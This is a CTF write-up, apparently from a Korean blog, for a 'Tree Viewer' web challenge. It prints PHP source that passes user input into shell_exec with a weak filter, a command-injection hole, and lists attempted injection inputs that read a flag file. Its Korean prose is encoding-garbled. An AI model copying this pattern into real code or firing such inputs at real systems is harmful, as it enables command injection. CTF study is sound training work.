# Tree Viewer WriteUp
1. ๋จผ์ ๋ฌธ์ ๋ฅผ ํ์ธํ ํ, ์ปจํ ์ด๋๋ฅผ ์ด์ด ์นํ์ด์ง๋ก ์ ์
2. ์ ์ ํ ์๋์ ๊ฐ์ ํ๋ฉด์ ํ์ธ
3. ์ฌ์ฉ์ ์ ๋ ฅ๋์ '12', '/hoho/23'์ด๋ผ๋ ๊ฐ์ ์ ๋ ฅํด๋ณธ ๊ฒฐ๊ณผ ์๋์ ๊ฐ์ ์ถ๋ ฅ์ ํ์ธํ ์ ์์๋ค.
4. ๋ฉ์ธ ํ๋ฉด์ Source code ๋ถ๋ถ์ ์ด์ด ์ฝ๋๋ฅผ ํ์ธํ์๋ค.
<?php
$parsed = isset($_POST['input']) ? $_POST['input'] : "/home/";
preg_match_all('/[;|]/m', $parsed, $illegals, PREG_SET_ORDER, 0);
if($illegals){
echo "Illegals chars found";
$parsed = "/home/";
}
if(isset($_GET['source'])){
highlight_file(__FILE__);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Tree Viewer</title>
</head>
<body>
<a href="/?source">Source code</a>
<hr/>
<form action="/" method="post">
<label for="input">Directory to check</label>
<input type="text" placeholder="Directory to see" id="input" name="input" value="<?= $parsed ?>">
</form>
<h3>Content of <?= $parsed ?>: <?= shell_exec('ls '.$parsed); ?></h3>
</body>
</html>
+ ์ฝ๋์ ์ฒซ ๋ถ๋ถ์์ ์ ๋ ฅ๋ ํด๋ ๊ฒฝ๋ก๋ฅผ ํ์ฑ
--> ์ ๋ ฅ๋ ๊ฒฝ๋ก๊ฐ ์กด์ฌํ์ง ์๊ฑฐ๋, ์ ์์ ์ธ ๋ฌธ์๊ฐ ์๋ ' ; ' ๋๋ ' | '์ ๊ฐ์ ๋ฌธ์๊ฐ ํฌํจ๋์ด ์๋ ๊ฒฝ์ฐ ๊ฒฝ๋ก๋ฅผ "/home/"์ผ๋ก ๋์ฒด
+ HTML ํผ์ ๋ ๋๋งํ์ฌ ์ฌ์ฉ์๊ฐ Directory to check ๋ผ๋ฒจ ํ๋จ์ ํด๋ ๊ฒฝ๋ก๋ฅผ ์ ๋ ฅํ ์ ์๊ฒ ํจ
--> ์ ๋ ฅ ํ๋๋ input ์ด๋ผ๋ ์ด๋ฆ์ผ๋ก POST ์์ฒญ์ ํตํด ์ ์ก
+ h3 ํ๊ทธ ์ฌ์ด์ ๊ฐ์ ํ์ฌ ๊ฒฝ๋ก์ ํ์ผ๊ณผ ํด๋๋ฅผ ๋ณด์ฌ์ฃผ๋ฉฐ, shell_exec() ํจ์๋ฅผ ์ฌ์ฉํ์ฌ ์ฌ์ฉ์๊ฐ ์ ๋ ฅํ ๊ฒฝ๋ก์ ํ์ผ๊ณผ ํด๋ ์ถ๋ ฅ
5. ์์ค์ฝ๋์ ์ทจ์ฝ์ ์ ์ด์ฉํ์ฌ ์๋์ ๊ฐ์ ์ ๋ ฅ๊ฐ๋ค๋ก ์๋ํด๋ณด์๋ค.
+ ์๋ํ ์ ๋ ฅ๊ฐ๋ค
$(cat /home/flag.txt) |
`cat /home/flag.txt` |
system("cat /home/flag.txt") |
$(cat /home/flag.txt) |
$(cat /home/flag.txt >&2) |
$(ls /home/; cat /home/flag.txt) |
$((cat /home/flag.txt)) |
${cat,/home/flag.txt} |
/home/flag && cat /home/flag.txt |
/home/11; cat /home/flag.txt |
/home/flag.txt |
'โ๏ธ Capture The Flag (CTF)' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[HSpace CTF 2023] HSpace Free Board Write Up (0) | 2023.09.02 |
---|---|
[Hero CTF v5] Hyper Loop Write Up (0) | 2023.05.14 |
[PwnMe CTF 2023] Just a XOR WriteUp (0) | 2023.05.06 |
[UMass CTF 2023] wrathsweatingbuddha WriteUp (Unsolved) (0) | 2023.03.25 |
[Line CTF 2023] Malcheeeeese WriteUp (Unsolved) (0) | 2023.03.25 |